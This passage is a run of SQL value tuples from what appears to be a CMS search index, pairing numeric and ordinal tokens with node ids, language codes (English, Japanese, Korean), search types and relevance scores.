('1146', 3, 'ko', 'node_search', 1),
('1146', 192, 'ja', 'node_search', 1),
('1147', 193, 'en', 'node_search', 1),
('1148', 4, 'en', 'node_search', 2),
('1148', 4, 'ja', 'node_search', 1),
('1148', 4, 'ko', 'node_search', 1),
('1149', 193, 'ja', 'node_search', 1),
('1150', 5, 'en', 'node_search', 1),
('1151', 5, 'en', 'node_search', 1),
('1151', 5, 'ja', 'node_search', 1),
('1151', 5, 'ko', 'node_search', 1),
('1152024', 140, 'en', 'node_search', 1),
('1152024', 140, 'ja', 'node_search', 1),
('1152024', 142, 'en', 'node_search', 1),
('1152024', 142, 'ja', 'node_search', 1),
('1192024', 143, 'en', 'node_search', 1),
('1192024', 143, 'ja', 'node_search', 1),
('1192024', 144, 'en', 'node_search', 1),
('1192024', 144, 'ja', 'node_search', 1),
('1192026', 197, 'en', 'node_search', 1),
('1192026', 197, 'ja', 'node_search', 1),
('1192026', 198, 'en', 'node_search', 1),
('1192026', 198, 'ja', 'node_search', 1),
('1192026', 199, 'en', 'node_search', 1),
('1192026', 199, 'ja', 'node_search', 1),
('1192026', 200, 'ja', 'node_search', 1),
('12', 155, 'ja', 'node_search', 0.892724),
('12', 177, 'en', 'node_search', 6),
('12', 177, 'ja', 'node_search', 4.71423),
('1200', 62, 'en', 'node_search', 1),
('1202', 5, 'ja', 'node_search', 1),
('1202024', 137, 'en', 'node_search', 1),
('1202024', 137, 'ja', 'node_search', 1),
('1202024', 139, 'en', 'node_search', 1),
('1202024', 139, 'ja', 'node_search', 1),
('1202024', 141, 'en', 'node_search', 1),
('1202024', 141, 'ja', 'node_search', 1),
('1204', 194, 'en', 'node_search', 1),
('1212026', 192, 'en', 'node_search', 1),
('1212026', 192, 'ja', 'node_search', 1),
('1212026', 193, 'en', 'node_search', 1),
('1212026', 193, 'ja', 'node_search', 1),
('1212026', 194, 'en', 'node_search', 1),
('1212026', 194, 'ja', 'node_search', 1),
('1212026', 195, 'en', 'node_search', 1),
('1212026', 195, 'ja', 'node_search', 1),
('1212026', 196, 'en', 'node_search', 1),
('1212026', 196, 'ja', 'node_search', 1),
('1216', 152, 'en', 'node_search', 1),
('1218', 6, 'en', 'node_search', 1),
('1222024', 134, 'en', 'node_search', 1),
('1222024', 134, 'ja', 'node_search', 1),
('1222026', 188, 'en', 'node_search', 1),
('1222026', 188, 'ja', 'node_search', 1),
('1222026', 189, 'en', 'node_search', 1),
('1222026', 189, 'ja', 'node_search', 1),
('1222026', 190, 'en', 'node_search', 1),
('1222026', 191, 'en', 'node_search', 1),
('1222026', 191, 'ja', 'node_search', 1),
('1228', 70, 'en', 'node_search', 1),
('1229', 7, 'en', 'node_search', 1),
('1229', 71, 'en', 'node_search', 1),
('1230', 155, 'en', 'node_search', 1),
('1233', 8, 'en', 'node_search', 1),
('1234', 154, 'en', 'node_search', 1),
('1241', 9, 'en', 'node_search', 1),
('1242024', 132, 'en', 'node_search', 1),
('1242024', 132, 'ja', 'node_search', 1),
('1242026', 185, 'en', 'node_search', 1),
('1242026', 185, 'ja', 'node_search', 1),
('1242026', 186, 'en', 'node_search', 1),
('1242026', 186, 'ja', 'node_search', 1),
('1242026', 187, 'en', 'node_search', 1),
('1242026', 187, 'ja', 'node_search', 1),
('1244', 154, 'ja', 'node_search', 1),
('1245', 70, 'ja', 'node_search', 1),
('1247', 152, 'ja', 'node_search', 1),
('1250', 71, 'ja', 'node_search', 1),
('12500000', 31, 'en', 'node_search', 1),
('1254', 31, 'en', 'node_search', 1),
('1256', 100, 'en', 'node_search', 1),
('1256', 194, 'ja', 'node_search', 1),
('1257', 72, 'en', 'node_search', 1),
('1258', 73, 'en', 'node_search', 1),
('1258', 155, 'en', 'node_search', 1),
('1262026', 184, 'en', 'node_search', 1),
('1262026', 184, 'ja', 'node_search', 1),
('13', 78, 'ja', 'node_search', 1),
('130', 62, 'en', 'node_search', 0.949597),
('1300', 195, 'en', 'node_search', 1),
('1301', 100, 'ja', 'node_search', 1),
('1302026', 181, 'en', 'node_search', 1),
('1302026', 181, 'ja', 'node_search', 1),
('1302026', 182, 'en', 'node_search', 1),
('1302026', 182, 'ja', 'node_search', 1),
('1302026', 183, 'en', 'node_search', 1),
('1302026', 183, 'ja', 'node_search', 1),
('1303', 195, 'ja', 'node_search', 1),
('1304', 196, 'en', 'node_search', 1),
('1310', 72, 'ja', 'node_search', 1),
('1311', 196, 'ja', 'node_search', 1),
('1312', 74, 'en', 'node_search', 1),
('1313', 197, 'en', 'node_search', 1),
('1316', 73, 'ja', 'node_search', 1),
('1318', 197, 'ja', 'node_search', 1),
('1320', 74, 'ja', 'node_search', 1),
('1322', 198, 'en', 'node_search', 1),
('1327', 17, 'en', 'node_search', 1),
('1327', 198, 'ja', 'node_search', 1),
('1328', 199, 'en', 'node_search', 1),
('1330', 155, 'ja', 'node_search', 1),
('1330', 199, 'ja', 'node_search', 1),
('1333', 200, 'ja', 'node_search', 1),
('1347', 18, 'en', 'node_search', 1),
('1356', 156, 'en', 'node_search', 1),
('1359', 157, 'ja', 'node_search', 1),
('1362024', 78, 'en', 'node_search', 28),
('1362024', 78, 'ja', 'node_search', 27),
('14', 154, 'en', 'node_search', 6),
('14', 154, 'ja', 'node_search', 4.78691),
('14', 164, 'en', 'node_search', 2),
('14', 164, 'ja', 'node_search', 1.75231),
('1402', 156, 'ja', 'node_search', 1),
('1404', 75, 'en', 'node_search', 1),
('1410', 157, 'en', 'node_search', 1),
('1413', 76, 'en', 'node_search', 1),
('1414', 75, 'ja', 'node_search', 1),
('1418', 148, 'en', 'node_search', 1),
('1419', 148, 'ja', 'node_search', 1),
('1421', 76, 'ja', 'node_search', 1),
('1423', 82, 'en', 'node_search', 1),
('1425', 132, 'en', 'node_search', 1),
('1426', 77, 'en', 'node_search', 1),
('1431', 66, 'en', 'node_search', 1),
('1450', 149, 'en', 'node_search', 1),
('1455', 150, 'en', 'node_search', 1),
('1458', 160, 'en', 'node_search', 1),
('15', 5, 'en', 'node_search', 1),
('15', 5, 'ja', 'node_search', 1),
('15', 5, 'ko', 'node_search', 1),
('15', 6, 'en', 'help_search', 1),
('15', 6, 'ja', 'help_search', 1),
('15', 6, 'ko', 'help_search', 1),
('15', 140, 'en', 'node_search', 47),
('15', 140, 'ja', 'node_search', 47),
('15', 155, 'en', 'node_search', 1),
('15', 155, 'ja', 'node_search', 0.916736),
('1500', 160, 'ja', 'node_search', 1),
('150000', 31, 'en', 'node_search', 1),
('1501', 161, 'ja', 'node_search', 1),
('150200', 3, 'en', 'node_search', 1),
('150200', 3, 'ja', 'node_search', 1),
('150200', 3, 'ko', 'node_search', 1),
('1503', 161, 'en', 'node_search', 1),
('1507', 19, 'en', 'node_search', 1),
('1513', 150, 'ja', 'node_search', 1),
('1518', 151, 'en', 'node_search', 1),
('1519', 77, 'ja', 'node_search', 1),
('1519', 151, 'ja', 'node_search', 1),
('1523', 103, 'en', 'node_search', 1),
('1523', 132, 'ja', 'node_search', 1),
('1526', 67, 'ja', 'node_search', 1),
('1527', 133, 'en', 'node_search', 1),
('1527', 134, 'en', 'node_search', 1),
('1527', 162, 'en', 'node_search', 1),
('1529', 162, 'ja', 'node_search', 1),
('1532', 133, 'ja', 'node_search', 1),
('1534', 101, 'en', 'node_search', 1),
('1534', 163, 'en', 'node_search', 1),
('1536', 78, 'en', 'node_search', 1),
('1536', 134, 'ja', 'node_search', 1),
('1538', 135, 'en', 'node_search', 1),
('1538', 163, 'ja', 'node_search', 1),
('1541', 78, 'ja', 'node_search', 1),
('1541', 135, 'ja', 'node_search', 1),
('1543', 137, 'en', 'node_search', 1),
('1544', 101, 'ja', 'node_search', 1),
('1544', 136, 'en', 'node_search', 1),
('1545', 164, 'en', 'node_search', 1),
('1547', 79, 'en', 'node_search', 1),
('1547', 102, 'en', 'node_search', 1),
('1549', 136, 'ja', 'node_search', 1),
('1551', 137, 'ja', 'node_search', 1),
('1553', 138, 'en', 'node_search', 1),
('1553', 139, 'en', 'node_search', 1),
('1553', 164, 'ja', 'node_search', 1),
('1554', 102, 'ja', 'node_search', 1),
('1555', 138, 'ja', 'node_search', 1),
('1556', 165, 'en', 'node_search', 1),
('1557', 104, 'en', 'node_search', 1),
('1558', 139, 'ja', 'node_search', 1),
('1559', 140, 'en', 'node_search', 1),
('1582023', 31, 'en', 'node_search', 1),
('1601', 103, 'ja', 'node_search', 1),
('1601', 104, 'ja', 'node_search', 1),
('1602', 165, 'ja', 'node_search', 1),
('1605', 106, 'en', 'node_search', 1),
('1606', 105, 'en', 'node_search', 1),
('1606', 166, 'en', 'node_search', 1),
('1608', 140, 'ja', 'node_search', 1),
('1608', 166, 'ja', 'node_search', 1),
('1609', 20, 'en', 'node_search', 1),
('1609', 80, 'en', 'node_search', 1),
('1609', 105, 'ja', 'node_search', 1),
('1610', 167, 'en', 'node_search', 1),
('1612', 141, 'en', 'node_search', 1),
('1612', 167, 'ja', 'node_search', 1),
('1614', 168, 'en', 'node_search', 1),
('1616', 141, 'ja', 'node_search', 1),
('1616', 142, 'en', 'node_search', 1),
('1617', 143, 'en', 'node_search', 1),
('1617', 168, 'ja', 'node_search', 1),
('1619', 106, 'ja', 'node_search', 1),
('1620', 169, 'en', 'node_search', 1),
('1621', 80, 'ja', 'node_search', 1),
('1622', 142, 'ja', 'node_search', 1),
('1623', 169, 'ja', 'node_search', 1),
('1624', 81, 'en', 'node_search', 1),
('1624', 107, 'en', 'node_search', 1),
('1625', 143, 'ja', 'node_search', 1),
('1626', 144, 'en', 'node_search', 1),
('1626', 170, 'en', 'node_search', 1),
('1627', 107, 'ja', 'node_search', 1),
('1627', 108, 'en', 'node_search', 1),
('1628', 28, 'en', 'node_search', 1),
('1628', 145, 'en', 'node_search', 1),
('1629', 81, 'ja', 'node_search', 1),
('1631', 85, 'en', 'node_search', 1),
('1631', 108, 'ja', 'node_search', 1),
('1631', 109, 'en', 'node_search', 1),
('1632', 145, 'ja', 'node_search', 1),
('1633', 28, 'ja', 'node_search', 1),
('1634', 109, 'ja', 'node_search', 1),
('1635', 144, 'ja', 'node_search', 1),
('1636', 28, 'ko', 'node_search', 1),
('1637', 29, 'en', 'node_search', 1),
('1637', 110, 'en', 'node_search', 1),
('1638', 111, 'en', 'node_search', 1),
('1642', 110, 'ja', 'node_search', 1),
('1644', 29, 'ja', 'node_search', 1),
('1645', 29, 'ko', 'node_search', 1),
('1645', 170, 'ja', 'node_search', 1),
('1648', 171, 'en', 'node_search', 1),
('1650', 111, 'ja', 'node_search', 1),
('1652', 113, 'en', 'node_search', 1),
('1654', 112, 'en', 'node_search', 1),
('1654', 112, 'ja', 'node_search', 1),
('1656', 114, 'en', 'node_search', 1),
('1657', 171, 'ja', 'node_search', 1),
('1658', 30, 'en', 'node_search', 1),
('1659', 30, 'ja', 'node_search', 1),
('1659', 83, 'en', 'node_search', 1),
('1659', 113, 'ja', 'node_search', 1),
('1701', 30, 'ko', 'node_search', 1),
('1702', 82, 'ja', 'node_search', 1),
('1705', 84, 'en', 'node_search', 1),
('1705', 114, 'ja', 'node_search', 1),
('1708', 83, 'ja', 'node_search', 1),
('1708', 173, 'en', 'node_search', 1),
('1711', 115, 'en', 'node_search', 1),
('1712', 85, 'ja', 'node_search', 1),
('1712', 173, 'ja', 'node_search', 1),
('1713', 84, 'ja', 'node_search', 1),
('1713', 116, 'en', 'node_search', 1),
('1713', 146, 'en', 'node_search', 1),
('1714', 86, 'en', 'node_search', 1),
('1714', 174, 'en', 'node_search', 1),
('1716', 115, 'ja', 'node_search', 1),
('1718', 87, 'ja', 'node_search', 1),
('1718', 90, 'en', 'node_search', 1),
('1718', 174, 'ja', 'node_search', 1),
('1719', 117, 'en', 'node_search', 1),
('1719', 146, 'ja', 'node_search', 1),
('1720', 116, 'ja', 'node_search', 1),
('1720', 175, 'en', 'node_search', 1),
('1721', 86, 'ja', 'node_search', 1),
('1721', 117, 'ja', 'node_search', 1),
('1722', 118, 'en', 'node_search', 1),
('1723', 120, 'en', 'node_search', 1),
('1724', 118, 'ja', 'node_search', 1),
('1724', 175, 'ja', 'node_search', 1),
('1726', 88, 'en', 'node_search', 1),
('1726', 119, 'en', 'node_search', 1),
('1729', 87, 'en', 'node_search', 1),
('1729', 88, 'ja', 'node_search', 1),
('1729', 119, 'ja', 'node_search', 1),
('1729', 176, 'en', 'node_search', 1),
('1730', 89, 'en', 'node_search', 1),
('1731', 120, 'ja', 'node_search', 1),
('1731', 121, 'en', 'node_search', 1),
('1733', 121, 'ja', 'node_search', 1),
('1733', 122, 'en', 'node_search', 1),
('1734', 89, 'ja', 'node_search', 1),
('1735', 123, 'en', 'node_search', 1),
('1737', 90, 'ja', 'node_search', 1),
('1737', 91, 'en', 'node_search', 1),
('1737', 122, 'ja', 'node_search', 1),
('1738', 1, 'ja', 'node_search', 1),
('1738', 95, 'en', 'node_search', 1),
('1738', 123, 'ja', 'node_search', 1),
('1738', 176, 'ja', 'node_search', 1),
('1740', 124, 'en', 'node_search', 1),
('1740', 177, 'en', 'node_search', 1),
('1741', 1, 'ko', 'node_search', 1),
('1741', 91, 'ja', 'node_search', 1),
('1742', 177, 'ja', 'node_search', 1),
('1743', 92, 'en', 'node_search', 1),
('1745', 124, 'ja', 'node_search', 1),
('1746', 92, 'ja', 'node_search', 1),
('1746', 125, 'en', 'node_search', 1),
('1746', 153, 'en', 'node_search', 1),
('1748', 11, 'ja', 'node_search', 1),
('1748', 126, 'en', 'node_search', 1),
('1749', 11, 'ko', 'node_search', 1),
('1749', 125, 'ja', 'node_search', 1),
('1750', 93, 'en', 'node_search', 1),
('1750', 126, 'ja', 'node_search', 1),
('1750', 153, 'ja', 'node_search', 1),
('1751', 127, 'en', 'node_search', 1),
('1752', 178, 'en', 'node_search', 1),
('1754', 93, 'ja', 'node_search', 1),
('1754', 127, 'ja', 'node_search', 1),
('1757', 21, 'en', 'node_search', 1),
('1757', 22, 'en', 'node_search', 1),
('1757', 94, 'en', 'node_search', 1),
('18', 62, 'en', 'node_search', 1.86697),
('18', 62, 'ja', 'node_search', 30.1988),
('1800', 128, 'en', 'node_search', 1),
('180000', 66, 'en', 'node_search', 1),
('180000', 155, 'en', 'node_search', 1),
('180000', 155, 'ja', 'node_search', 0.873132),
('1804', 128, 'ja', 'node_search', 1),
('1805', 23, 'en', 'node_search', 1),
('1807', 23, 'ja', 'node_search', 1),
('1807', 23, 'ko', 'node_search', 1),
('1807', 129, 'en', 'node_search', 1),
('1808', 24, 'en', 'node_search', 1),
('1808', 24, 'ja', 'node_search', 1),
('1808', 96, 'en', 'node_search', 1),
('1809', 25, 'en', 'node_search', 1),
('1809', 95, 'ja', 'node_search', 1),
('1809', 129, 'ja', 'node_search', 1),
('1810', 25, 'ja', 'node_search', 1),
('1810', 25, 'ko', 'node_search', 1),
('1811', 26, 'en', 'node_search', 1),
('1811', 26, 'ja', 'node_search', 1),
('1812', 26, 'ko', 'node_search', 1),
('1812', 27, 'en', 'node_search', 1),
('1813', 27, 'ja', 'node_search', 1),
('1813', 27, 'ko', 'node_search', 1),
('1813', 130, 'en', 'node_search', 1),
('1815', 96, 'ja', 'node_search', 1),
('1817', 97, 'en', 'node_search', 1),
('1817', 98, 'en', 'node_search', 1),
('1817', 130, 'ja', 'node_search', 1),
('1818', 131, 'en', 'node_search', 1),
('1819', 178, 'ja', 'node_search', 1),
('1820', 131, 'ja', 'node_search', 1),
('1822', 179, 'en', 'node_search', 1),
('1823', 179, 'ja', 'node_search', 1),
('1824', 180, 'en', 'node_search', 1),
('1825', 97, 'ja', 'node_search', 1),
('1826', 98, 'ja', 'node_search', 1),
('1826', 180, 'ja', 'node_search', 1),
('1827', 99, 'en', 'node_search', 1),
('1828', 181, 'en', 'node_search', 1),
('1830', 99, 'ja', 'node_search', 1),
('1830', 181, 'ja', 'node_search', 1),
('1831', 182, 'en', 'node_search', 1),
('1833', 182, 'ja', 'node_search', 1),
('1834', 183, 'en', 'node_search', 1),
('1835', 183, 'ja', 'node_search', 1),
('1838', 184, 'en', 'node_search', 1),
('18393300', 28, 'en', 'node_search', 1),
('18393300', 28, 'ko', 'node_search', 1),
('18393300', 30, 'en', 'node_search', 1),
('18393300', 30, 'ko', 'node_search', 1),
('18393300', 31, 'en', 'node_search', 0.860547),
('18393300018393344', 4, 'en', 'node_search', 1),
('18393300018393344', 4, 'ja', 'node_search', 1),
('18393300018393344', 4, 'ko', 'node_search', 1),
('18393300018393344', 10, 'en', 'node_search', 1),
('18393300018393344', 10, 'ja', 'node_search', 1),
('18393300018393344', 10, 'ko', 'node_search', 1),
('18393300018393344', 18, 'en', 'node_search', 1),
('18393300018393344', 18, 'ja', 'node_search', 0.860547),
('18393300018393344', 18, 'ko', 'node_search', 1),
('18393300018393344', 19, 'en', 'node_search', 1),
('18393300018393344', 19, 'ja', 'node_search', 1),
('18393300018393344', 19, 'ko', 'node_search', 1),
('18393300018393344', 30, 'ja', 'node_search', 0.824901),
('18393344', 28, 'en', 'node_search', 1),
('18393344', 28, 'ko', 'node_search', 1),
('18393344', 30, 'en', 'node_search', 1),
('18393344', 30, 'ko', 'node_search', 1),
('18393344', 31, 'en', 'node_search', 0.857458),
('18393393', 31, 'en', 'node_search', 0.854391),
('1840', 184, 'ja', 'node_search', 1),
('1841', 185, 'en', 'node_search', 1),
('1844', 185, 'ja', 'node_search', 1),
('1846', 186, 'en', 'node_search', 1),
('1847', 186, 'ja', 'node_search', 1),
('18th', 62, 'en', 'node_search', 29),
('191', 27, 'en', 'node_search', 0.869951),
('19120012002', 27, 'ja', 'node_search', 0.500884),
('1914', 8, 'ja', 'node_search', 1),
('1914', 8, 'ko', 'node_search', 1),
('1914', 204, 'en', 'node_search', 4),
('1914', 204, 'ja', 'node_search', 4),
('1920', 6, 'ja', 'node_search', 1),
('1920', 6, 'ko', 'node_search', 1),
('1921', 7, 'ja', 'node_search', 1),
('1921', 7, 'ko', 'node_search', 1),
('1921', 17, 'ja', 'node_search', 1),
('1921', 17, 'ko', 'node_search', 1),
('1922', 9, 'ja', 'node_search', 1),
('1922', 9, 'ko', 'node_search', 1),
('1922', 19, 'ja', 'node_search', 1),
('1922', 20, 'ja', 'node_search', 1),
('1922', 20, 'ko', 'node_search', 1),
('1923', 19, 'ko', 'node_search', 1),
('1924', 10, 'ja', 'node_search', 1),
('1925', 3, 'ja', 'node_search', 1),
('1925', 3, 'ko', 'node_search', 1),
('1925', 4, 'ja', 'node_search', 1),
('1925', 4, 'ko', 'node_search', 1),
('1925', 5, 'ko', 'node_search', 1),
('1925', 10, 'ko', 'node_search', 1),
('1925', 18, 'ja', 'node_search', 1),
('1925', 18, 'ko', 'node_search', 1),
('1926', 10, 'en', 'node_search', 1),
('1927', 10, 'en', 'node_search', 1),
('1927', 10, 'ja', 'node_search', 1),
('1927', 10, 'ko', 'node_search', 1),
('1952024', 73, 'en', 'node_search', 27),
('1952024', 73, 'ja', 'node_search', 27),
('1952024', 76, 'en', 'node_search', 27),
('1952024', 76, 'ja', 'node_search', 27),
('1952024', 111, 'en', 'node_search', 27),
('1952024', 111, 'ja', 'node_search', 27),
('1959', 204, 'ja', 'node_search', 1),
('1962023', 20, 'en', 'node_search', 1),
('1962023', 20, 'ko', 'node_search', 1),
('1987', 27, 'en', 'node_search', 0.687638),
('1987', 27, 'ja', 'node_search', 0.349476),
('1990', 27, 'en', 'node_search', 0.676032),
('1990', 27, 'ja', 'node_search', 0.333924),
('1996', 27, 'en', 'node_search', 1),
('1996', 27, 'ja', 'node_search', 1),
('1must', 18, 'en', 'node_search', 1),
('1must', 18, 'ko', 'node_search', 1),
('1st', 19, 'en', 'node_search', 28),
('1st', 19, 'ko', 'node_search', 28),
('1st', 138, 'en', 'node_search', 46),
('1st', 138, 'ja', 'node_search', 27),
('1st', 140, 'en', 'node_search', 46),
('1st', 140, 'ja', 'node_search', 27),
('1th', 122, 'en', 'node_search', 46),
('1th', 122, 'ja', 'node_search', 27),
('2', 4, 'en', 'node_search', 1),
('2', 4, 'ja', 'node_search', 1),
('2', 6, 'en', 'help_search', 1),
('2', 6, 'ja', 'help_search', 1),
('2', 6, 'ko', 'help_search', 1),
('2', 10, 'en', 'node_search', 4),
('2', 10, 'ja', 'node_search', 1),
('2', 10, 'ko', 'node_search', 4),
('2', 11, 'ko', 'node_search', 1),
('2', 18, 'en', 'node_search', 1),
('2', 18, 'ja', 'node_search', 2),
('2', 18, 'ko', 'node_search', 1),
('2', 20, 'ja', 'node_search', 31),
('2', 24, 'en', 'node_search', 1),
('2', 24, 'ja', 'node_search', 1),
('2', 24, 'ko', 'node_search', 1),
('2', 27, 'en', 'node_search', 0.889397),
('2', 27, 'ja', 'node_search', 7.54005),
('2', 30, 'en', 'help_search', 1),
('2', 30, 'en', 'node_search', 1),
('2', 30, 'ja', 'help_search', 1),
('2', 30, 'ko', 'help_search', 1),
('2', 31, 'en', 'node_search', 2.90629),
('2', 80, 'ja', 'node_search', 8),
('2', 95, 'ja', 'node_search', 1),
('2', 98, 'ja', 'node_search', 19),
('2', 116, 'ja', 'node_search', 19),
('2', 133, 'ja', 'node_search', 19),
('2', 155, 'en', 'node_search', 1),
('2', 155, 'ja', 'node_search', 0.879565),
('2', 162, 'ja', 'node_search', 0.705825),
('2', 163, 'ja', 'node_search', 1.55099),
('2', 176, 'ja', 'node_search', 28.7407),
('2', 177, 'ja', 'node_search', 4.71423),
('2', 184, 'ja', 'node_search', 27),
('2', 205, 'en', 'node_search', 27),
('2', 205, 'ja', 'node_search', 27),
('20', 5, 'en', 'node_search', 2),
('20', 5, 'ja', 'node_search', 1.82206),
('20', 5, 'ko', 'node_search', 2),
('20', 20, 'ja', 'node_search', 4),
('20', 31, 'en', 'node_search', 0.942091),
('200', 3, 'en', 'node_search', 1),
('200', 3, 'ja', 'node_search', 1),
('200', 3, 'ko', 'node_search', 1),
('200', 23, 'en', 'node_search', 1),
('200', 23, 'ja', 'node_search', 0.674137),
('200', 23, 'ko', 'node_search', 0.96498),
('200', 72, 'en', 'help_search', 1),
('200', 72, 'ja', 'help_search', 1),
('200', 72, 'ko', 'help_search', 1),
('2000', 27, 'ja', 'node_search', 0.50505),
('2000', 62, 'en', 'node_search', 0.866793),
('2000', 62, 'ja', 'node_search', 0.549707),
('20000', 163, 'ja', 'node_search', 0.771698),
('200000', 62, 'en', 'node_search', 0.938382),
('200000', 62, 'ja', 'node_search', 0.615536),
('200000', 66, 'en', 'node_search', 1),
('200000', 163, 'ja', 'node_search', 0.857458),
('2001', 27, 'en', 'node_search', 0.879565),
('20012002', 27, 'en', 'node_search', 0.866793),
('2004', 23, 'en', 'node_search', 1),
('2004', 23, 'ja', 'node_search', 1),
('2004', 23, 'ko', 'node_search', 1),
('2004', 27, 'en', 'node_search', 1),
('2004', 27, 'ja', 'node_search', 1),
('2004', 204, 'en', 'node_search', 1),
('2004', 204, 'ja', 'node_search', 1),
('20042005', 27, 'en', 'node_search', 1),
('2005', 27, 'en', 'node_search', 0.759465),
('2005', 27, 'ja', 'node_search', 0.390435),
('20052006', 27, 'en', 'node_search', 0.754681),
('201', 11, 'ko', 'node_search', 1),
('201', 31, 'en', 'node_search', 0.845322),
('20132014', 27, 'en', 'node_search', 1),
('20132014', 27, 'ja', 'node_search', 0.851346),
('20142015', 27, 'en', 'node_search', 1),
('20142015', 27, 'ja', 'node_search', 0.848323),
('2022', 205, 'ja', 'node_search', 1),
('2023', 20, 'ja', 'node_search', 4),
('2023', 23, 'en', 'node_search', 1),
('2023', 23, 'ja', 'node_search', 1),
('2023', 23, 'ko', 'node_search', 1),
('2023', 29, 'ja', 'node_search', 1),
('2023', 62, 'en', 'node_search', 30.8629),
('2023', 62, 'ja', 'node_search', 30.2005),
('2023', 205, 'en', 'node_search', 1),
('2023', 205, 'ja', 'node_search', 1),
('2023', 206, 'ja', 'node_search', 2),
('2024', 68, 'ja', 'node_search', 4),
('2024', 69, 'en', 'node_search', 1),
('2024', 69, 'ja', 'node_search', 1),
('2024', 77, 'ja', 'node_search', 4),
('2024', 78, 'ja', 'node_search', 1),
('2024', 80, 'en', 'node_search', 4),
('2024', 80, 'ja', 'node_search', 4),
('2024', 126, 'en', 'node_search', 2),
('2024', 126, 'ja', 'node_search', 2),
('2026', 154, 'en', 'node_search', 6),
('2026', 154, 'ja', 'node_search', 4.78691),
('2026', 155, 'en', 'node_search', 1),
('2026', 155, 'ja', 'node_search', 0.923838),
('2026', 156, 'en', 'node_search', 2),
('2026', 156, 'ja', 'node_search', 1.9534),
('2026', 157, 'en', 'node_search', 2),
('2026', 157, 'ja', 'node_search', 1.84234),
('2026', 164, 'en', 'node_search', 2),
('2026', 164, 'ja', 'node_search', 1.75231),
('2026', 165, 'en', 'node_search', 6),
('2026', 165, 'ja', 'node_search', 6.99983),
('2026', 167, 'en', 'node_search', 6),
('2026', 167, 'ja', 'node_search', 4.81645),
('2026', 169, 'en', 'node_search', 5),
('2026', 169, 'ja', 'node_search', 4.16849),
('2026', 171, 'en', 'node_search', 9),
('2026', 171, 'ja', 'node_search', 7.11692),
('2026', 173, 'en', 'node_search', 9),
('2026', 173, 'ja', 'node_search', 7.04752),
('2026', 174, 'en', 'node_search', 6),
('2026', 174, 'ja', 'node_search', 4.72283),
('2026', 175, 'en', 'node_search', 6),
('2026', 175, 'ja', 'node_search', 4.76922),
('2026', 176, 'en', 'node_search', 6),
('2026', 176, 'ja', 'node_search', 4.74069),
('2026', 177, 'en', 'node_search', 6),
('2026', 177, 'ja', 'node_search', 4.71423),
('2026', 184, 'en', 'node_search', 5),
('2026', 184, 'ja', 'node_search', 4.76188),
('2027', 204, 'en', 'node_search', 1),
('2027', 205, 'en', 'node_search', 1),
('2032026', 161, 'en', 'node_search', 1),
('2032026', 161, 'ja', 'node_search', 1),
('2032026', 179, 'en', 'node_search', 1),
('2032026', 179, 'ja', 'node_search', 1),
('2032026', 180, 'en', 'node_search', 1),
('2032026', 180, 'ja', 'node_search', 1),
('2062024', 66, 'en', 'node_search', 2),
('2062024', 67, 'ja', 'node_search', 2),
('2072024', 136, 'en', 'node_search', 1),
('2072024', 136, 'ja', 'node_search', 1),
('2072024', 138, 'en', 'node_search', 1),
('2072024', 138, 'ja', 'node_search', 1),
('21', 156, 'en', 'node_search', 2),
('21', 156, 'ja', 'node_search', 1.9534),
('2100', 71, 'en', 'node_search', 1),
('2100', 71, 'ja', 'node_search', 1),
('2100', 84, 'en', 'node_search', 1),
('2100', 84, 'ja', 'node_search', 1),
('2100', 90, 'en', 'node_search', 1),
('2100', 90, 'ja', 'node_search', 1),
('210000', 162, 'en', 'node_search', 1),
('210000', 162, 'ja', 'node_search', 0.727213),
('2122024', 122, 'en', 'node_search', 27),
('2122024', 122, 'ja', 'node_search', 27),
('2122026', 177, 'en', 'node_search', 1),
('2122026', 177, 'ja', 'node_search', 1),
('2152024', 105, 'en', 'node_search', 1),
('2152024', 105, 'ja', 'node_search', 1),
('2182024', 103, 'en', 'node_search', 1),
('2182024', 103, 'ja', 'node_search', 1),
('22', 8, 'en', 'node_search', 2),
('22', 8, 'ja', 'node_search', 2),
('22', 31, 'en', 'node_search', 1),
('22', 68, 'ja', 'node_search', 4),
('22', 173, 'en', 'node_search', 9),
('22', 173, 'ja', 'node_search', 7.04752),
('2212024', 122, 'en', 'node_search', 1),
('2212024', 122, 'ja', 'node_search', 1),
('2242024', 68, 'en', 'node_search', 28),
('2242024', 68, 'ja', 'node_search', 27),
('2252024', 120, 'en', 'node_search', 1),
('2252024', 120, 'ja', 'node_search', 1),
('23', 167, 'en', 'node_search', 6),
('23', 167, 'ja', 'node_search', 4.81645),
('230000', 162, 'en', 'node_search', 0.989021),
('230000', 162, 'ja', 'node_search', 0.72066),
('2462000', 31, 'en', 'node_search', 1),
('25', 23, 'en', 'node_search', 1),
('25', 23, 'ja', 'node_search', 0.830633),
('25', 23, 'ko', 'node_search', 1),
('25', 27, 'en', 'node_search', 0.648686),
('25', 77, 'ja', 'node_search', 4),
('250000', 62, 'en', 'node_search', 0.882818),
('250000', 62, 'ja', 'node_search', 0.562486),
('250000', 163, 'ja', 'node_search', 0.854391),
('2562024', 77, 'en', 'node_search', 31),
('2562024', 77, 'ja', 'node_search', 27),
('26', 157, 'en', 'node_search', 2),
('26', 157, 'ja', 'node_search', 1.84234),
('26', 171, 'en', 'node_search', 9),
('26', 171, 'ja', 'node_search', 7.11692),
('26', 184, 'en', 'node_search', 5),
('26', 184, 'ja', 'node_search', 4.76188),
('262024', 79, 'en', 'node_search', 27),
('262024', 80, 'en', 'node_search', 27),
('262024', 80, 'ja', 'node_search', 27),
('265', 27, 'en', 'node_search', 0.757065),
('26520052006', 27, 'ja', 'node_search', 0.389816),
('29', 175, 'en', 'node_search', 6),
('29', 175, 'ja', 'node_search', 4.76922),
('295', 27, 'en', 'node_search', 1),
('29520042005', 23, 'en', 'node_search', 1),
('29520042005', 23, 'ja', 'node_search', 1),
('29520042005', 23, 'ko', 'node_search', 1),
('29520042005', 27, 'ja', 'node_search', 1),
('2952024', 113, 'en', 'node_search', 27),
('2952024', 113, 'ja', 'node_search', 27),
('2living', 18, 'en', 'node_search', 1),
('2living', 18, 'ko', 'node_search', 1),
('2nd', 11, 'en', 'node_search', 1),
('2nd', 11, 'ja', 'node_search', 1),
('2nd', 20, 'en', 'node_search', 28),
('2nd', 20, 'ko', 'node_search', 28),
('2nd', 95, 'ja', 'node_search', 27),
('2nd', 98, 'en', 'node_search', 28),
('2nd', 98, 'ja', 'node_search', 27),
('2nd', 133, 'en', 'node_search', 46),
('2nd', 133, 'ja', 'node_search', 27),
('2th', 116, 'en', 'node_search', 46),
('2th', 116, 'ja', 'node_search', 27),
('3', 4, 'en', 'node_search', 1),
('3', 4, 'ja', 'node_search', 1),
